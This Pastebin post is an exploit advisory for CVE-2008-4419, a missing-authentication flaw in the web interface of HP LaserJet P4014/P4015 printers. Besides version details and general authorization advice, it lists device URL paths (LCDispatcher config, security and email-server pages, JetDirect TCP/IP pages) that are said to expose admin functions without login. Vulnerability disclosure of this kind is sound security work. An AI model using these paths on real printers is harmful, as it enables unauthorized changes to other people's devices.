Advertisement
KingSkrupellos

HP LaserJet P4014/P4015 Printers Bypass Missing Auth

Apr 1st, 2019
131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.88 KB | None | 0 0
  1. ############################################################################################
  2.  
  3. # Exploit Title : HP LaserJet P4014/P4015 Printers 6.7.0.x Bypass Missing Authentication
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 31/03/2019
  7. # Vendor Homepage : hp.com
  8. # Software Information Link :
  9. support.hp.com/au-en/drivers/selfservice/hp-laserjet-p4014-printer-series/3558788/model/3558789
  10. support.hp.com/us-en/drivers/selfservice/hp-laserjet-p4015-printer-series/3558793
  11. # Software Version :
  12. Driver-Universal Print Driver for Managed Services => Version 6.7.0.23989
  13. Example Printer Model P4014/P4015 => Version CB512A and CB507A - CB509A - CXXXXA
  14. Firmware => Version 04.270.2 - 04.060.7 - 04.080.8 - 04.044.0 - 04.049.0
  15. Software Universal Printer Driver => Version 1.8.6
  16. # Tested On : Windows and Linux
  17. # Category : WebApps
  18. # Exploit Risk : High
  19. # CVE : CVE-2008-4419
  20. # Vulnerability Type : CWE-306 [ Missing Authentication for Critical Function ]
  21. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  22. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  23. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  24.  
  25. ############################################################################################
  26.  
  27. # Description about Software :
  28. ***************************
  29. HP LaserJet as a brand name identifies the line of dry electrophotographic DEP laser printers marketed by the American
  30.  
  31. computer company Hewlett-Packard (HP). The HP LaserJet was the world's first desktop laser printer.
  32.  
  33. ############################################################################################
  34.  
  35. # Impact :
  36. ***********
  37. The software does not perform any authentication for functionality that requires a provable user identity
  38.  
  39. or consumes a significant amount of resources.
  40.  
  41. The vulnerability allows a remote unauthenticated attacker to send specially crafted HTTP request to the
  42.  
  43. affected application and change configuration settings or gain administrative access.
  44.  
  45. Missing authentication for critical function is a language independent issue that can appear in any multiuser environment.
  46.  
  47. Developing a fix would require understanding of the current application security model and implemented access controls.
  48.  
  49. Three basic rules however can help you eliminate potential improper authorization issues:
  50.  
  51. 1) Identify all privileged assets within your application (web pages that display sensitive data,
  52. website sections that contain privileged/administrative functionality, etc.)
  53.  
  54. 2) Identify user roles within the application and their access permissions
  55.  
  56. 3) Always check if the user should have privileges to access the asset
  57.  
  58. ############################################################################################
  59.  
  60. # Bypass Missing Authentication Exploit / Vulnerability :
  61. *************************************************
  62. /hp/device/this.LCDispatcher
  63.  
  64. /hp/device/this.LCDispatcher?nav=hp.EmailServer
  65.  
  66. /hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=1&lstid=-1
  67.  
  68. /hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=3&lstid=1
  69.  
  70. /hp/device/this.LCDispatcher?nav=hp.Alerts
  71.  
  72. /hp/device/this.LCDispatcher?nav=hp.AutoSend
  73.  
  74. /hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0
  75.  
  76. /hp/device/this.LCDispatcher?nav=hp.OtherLinks
  77.  
  78. /hp/device/this.LCDispatcher?nav=hp.Config
  79.  
  80. /hp/device/this.LCDispatcher?nav=hp.DeviceInfoConfig
  81.  
  82. /hp/jetdirect
  83.  
  84. /config_pro.htm
  85. /tcpipv6.htm
  86. /tcpipv4.htm
  87.  
  88. /tcp_param.htm
  89. /network_id.htm
  90.  
  91. /tcp_summary.htm
  92. /index_info.htm
  93.  
  94. /support_param.html
  95. /support.htm
  96.  
  97. /tcp_diag.htm
  98. /configpage.htm
  99.  
  100. /tcp_param.htm
  101. /network_id.htm
  102.  
  103. ############################################################################################
  104.  
  105. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  106.  
  107. ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement